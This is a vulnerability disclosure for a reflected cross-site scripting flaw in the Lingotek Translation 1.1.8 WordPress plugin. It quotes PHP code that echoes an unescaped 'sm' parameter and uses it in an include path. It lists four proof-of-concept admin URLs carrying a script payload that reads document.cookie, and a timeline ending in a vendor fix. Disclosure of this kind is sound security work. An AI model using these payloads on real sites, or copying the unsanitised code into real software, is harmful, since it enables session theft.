Lingotek Translation 1.1.8 Reflected XSS

Datetime:2016-08-22 21:57:55          Topic: XSS Vulnerability           Share

20 Jun 2016

Homepage:

https://wordpress.org/plugins/lingotek-translation/

Description:

$_GET['sm'] is not escaped.

File: lingotek-translation\admin\settings.php

$submenu = isset($_GET['sm']) ? $_GET['sm'] : 'account';
$dir = dirname(__FILE__) . '/settings/';
$filename = $dir . 'view-' . $submenu . ".php";
if (file_exists($filename))
  include $filename;
else
  echo "TO-DO: create <i>" . 'settings/view-' . $submenu . ".php</i>";

Similar issue exists also inside view-manage.php and view-tutorial.php .

Proof of Concept:

XSS will be visible for administrator.

http://wp/wp-admin/admin.php?page=wp-lingotek&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_settings&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_tutorial&sm=<script>alert(document.cookie);</script>
http://wp/wp-admin/admin.php?page=wp-lingotek_manage&sm=<script>alert(document.cookie);</script>

Timeline:

  • 02-12-2015: Discovered
  • 02-12-2015: Vendor notified
  • 19-01-2016: Version 1.1.9 released, issue resolved




About List